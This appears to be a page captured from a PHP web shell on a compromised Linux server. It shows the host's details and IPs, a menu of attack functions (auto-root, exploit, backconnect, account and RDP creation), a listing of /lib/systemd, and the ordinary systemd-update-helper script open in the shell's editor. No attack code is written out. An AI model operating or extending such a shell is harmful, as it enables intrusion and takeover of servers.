Linux srv1.sbit.com.bd 5.14.0-503.21.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Sun Jan 12 09:45:05 EST 2025 x86_64
Apache
: 192.99.39.68 | : 216.73.216.165
Cant Read [ /etc/named.conf ]
8.2.29
gzmcfenigov
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
lib /
systemd /
[ HOME SHELL ]
Name
Size
Permission
Action
boot
[ DIR ]
drwxr-xr-x
catalog
[ DIR ]
drwxr-xr-x
network
[ DIR ]
drwxr-xr-x
ntp-units.d
[ DIR ]
drwxr-xr-x
system
[ DIR ]
drwxr-xr-x
system-generators
[ DIR ]
drwxr-xr-x
system-preset
[ DIR ]
drwxr-xr-x
system-shutdown
[ DIR ]
drwxr-xr-x
system-sleep
[ DIR ]
drwxr-xr-x
user
[ DIR ]
drwxr-xr-x
user-environment-generators
[ DIR ]
drwxr-xr-x
user-generators
[ DIR ]
drwxr-xr-x
user-preset
[ DIR ]
drwxr-xr-x
libsystemd-shared.abignore
100
B
-rw-r--r--
purge-nobody-user
2.3
KB
-rwxr-xr-x
resolv.conf
710
B
-rw-r--r--
systemd
95.74
KB
-rwxr-xr-x
systemd-ac-power
15.03
KB
-rwxr-xr-x
systemd-backlight
35.37
KB
-rwxr-xr-x
systemd-binfmt
23.31
KB
-rwxr-xr-x
systemd-bless-boot
31.6
KB
-rwxr-xr-x
systemd-boot-check-no-failures
15.3
KB
-rwxr-xr-x
systemd-cgroups-agent
15.24
KB
-rwxr-xr-x
systemd-coredump
71.73
KB
-rwxr-xr-x
systemd-cryptsetup
92.46
KB
-rwxr-xr-x
systemd-export
43.55
KB
-rwxr-xr-x
systemd-fsck
31.31
KB
-rwxr-xr-x
systemd-growfs
23.26
KB
-rwxr-xr-x
systemd-hibernate-resume
15.05
KB
-rwxr-xr-x
systemd-hostnamed
51.91
KB
-rwxr-xr-x
systemd-initctl
23.34
KB
-rwxr-xr-x
systemd-integritysetup
23.52
KB
-rwxr-xr-x
systemd-journald
181.16
KB
-rwxr-xr-x
systemd-localed
51.69
KB
-rwxr-xr-x
systemd-logind
295.72
KB
-rwxr-xr-x
systemd-makefs
15.25
KB
-rwxr-xr-x
systemd-measure
51.93
KB
-rwxr-xr-x
systemd-modules-load
23.54
KB
-rwxr-xr-x
systemd-network-generator
43.66
KB
-rwxr-xr-x
systemd-pcrphase
31.54
KB
-rwxr-xr-x
systemd-pstore
23.41
KB
-rwxr-xr-x
systemd-quotacheck
15.08
KB
-rwxr-xr-x
systemd-random-seed
27.3
KB
-rwxr-xr-x
systemd-remount-fs
19.28
KB
-rwxr-xr-x
systemd-reply-password
15.27
KB
-rwxr-xr-x
systemd-rfkill
23.35
KB
-rwxr-xr-x
systemd-shutdown
51.51
KB
-rwxr-xr-x
systemd-sleep
31.37
KB
-rwxr-xr-x
systemd-socket-proxyd
31.49
KB
-rwxr-xr-x
systemd-sulogin-shell
19.35
KB
-rwxr-xr-x
systemd-sysctl
27.55
KB
-rwxr-xr-x
systemd-sysroot-fstab-check
56.16
KB
-rwxr-xr-x
systemd-sysupdate
124.7
KB
-rwxr-xr-x
systemd-timedated
47.63
KB
-rwxr-xr-x
systemd-update-done
15.27
KB
-rwxr-xr-x
systemd-update-helper
3.76
KB
-rwxr-xr-x
systemd-update-utmp
23.35
KB
-rwxr-xr-x
systemd-user-runtime-dir
23.3
KB
-rwxr-xr-x
systemd-user-sessions
15.05
KB
-rwxr-xr-x
systemd-vconsole-setup
19.31
KB
-rwxr-xr-x
systemd-veritysetup
23.47
KB
-rwxr-xr-x
systemd-volatile-root
23.3
KB
-rwxr-xr-x
systemd-xdg-autostart-conditio...
15.3
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : systemd-update-helper
#!/usr/bin/bash # SPDX-License-Identifier: LGPL-2.1-or-later set -eu set -o pipefail command="${1:?}" shift command -v systemctl >/dev/null || exit 0 case "$command" in install-system-units) systemctl --no-reload preset "$@" ;; install-user-units) systemctl --no-reload preset --global "$@" ;; remove-system-units) if [ -d /run/systemd/system ]; then systemctl --no-reload disable --now --no-warn "$@" else systemctl --no-reload disable --no-warn "$@" fi ;; remove-user-units) systemctl --global disable --no-warn "$@" [ -d /run/systemd/system ] || exit 0 users=$(systemctl list-units 'user@*' --legend=no | sed -n -r 's/.*user@([0-9]+).service.*/\1/p') for user in $users; do SYSTEMD_BUS_TIMEOUT=15s \ systemctl --user -M "$user@" disable --now --no-warn "$@" & done wait ;; mark-restart-system-units) [ -d /run/systemd/system ] || exit 0 for unit in "$@"; do systemctl set-property "$unit" Markers=+needs-restart & done wait ;; mark-reload-system-units) [ -d /run/systemd/system ] || exit 0 for unit in "$@"; do systemctl set-property "$unit" Markers=+needs-reload & done wait ;; mark-restart-user-units) [ -d /run/systemd/system ] || exit 0 users=$(systemctl list-units 'user@*' --legend=no | sed -n -r 's/.*user@([0-9]+).service.*/\1/p') for user in $users; do for unit in "$@"; do SYSTEMD_BUS_TIMEOUT=15s \ systemctl --user -M "$user@" set-property "$unit" Markers=+needs-restart & done done wait ;; mark-reload-user-units) [ -d /run/systemd/system ] || exit 0 users=$(systemctl list-units 'user@*' --legend=no | sed -n -r 's/.*user@([0-9]+).service.*/\1/p') for user in $users; do for unit in "$@"; do SYSTEMD_BUS_TIMEOUT=15s \ systemctl --user -M "$user@" set-property "$unit" Markers=+needs-reload & done done wait ;; system-reload-restart|system-reload|system-restart) if [ -n "$*" ]; then echo "Unexpected arguments for '$command': $*" exit 2 fi [ -d /run/systemd/system ] || exit 0 if [[ "$command" =~ reload ]]; then systemctl daemon-reload fi if [[ "$command" =~ restart ]]; then systemctl reload-or-restart --marked fi ;; user-reload-restart|user-reload|user-restart|user-reexec) if [ -n "$*" ]; then echo "Unexpected arguments for '$command': $*" exit 2 fi [ -d /run/systemd/system ] || exit 0 users=$(systemctl list-units 'user@*' --legend=no | sed -n -r 's/.*user@([0-9]+).service.*/\1/p') if [[ "$command" =~ reexec ]]; then for user in $users; do SYSTEMD_BUS_TIMEOUT=15s \ systemctl --user -M "$user@" daemon-reexec & done wait fi if [[ "$command" =~ reload ]]; then for user in $users; do SYSTEMD_BUS_TIMEOUT=15s \ systemctl --user -M "$user@" daemon-reload & done wait fi if [[ "$command" =~ restart ]]; then for user in $users; do SYSTEMD_BUS_TIMEOUT=15s \ systemctl --user -M "$user@" reload-or-restart --marked & done wait fi ;; *) echo "Unknown verb '$command'" exit 3 ;; esac
Close